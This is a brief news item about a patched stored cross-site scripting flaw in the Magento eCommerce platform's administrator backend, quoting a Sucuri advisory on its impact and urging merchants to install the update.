A just-patched weakness in the Magento eCommerce platform has left millions of online merchants potentially at risk of a hijacking attack.
Because said scripts are executed with administrator accounts, the exploit makes it possible to completely control an entire server operating the eCommerce platform.
“The buggy snippet is located inside Magento core libraries, more specifically within the administrator’s backend,” a Sucuri advisory explained. “Unless you’re behind a WAF or you have a very heavily modified administration panel, you’re at risk. As this is a Stored XSS vulnerability, this issue could be used by attackers to take over your site, create new administrator accounts, steal client information, anything a legitimate administrator account is allowed to do.”
XSS bugs are the result of Web applications not stripping executable code out of user-supplied input entered into websites.
They are a common kind of digital malady, and security experts are recommending that Magento users install the patch update as soon as possible.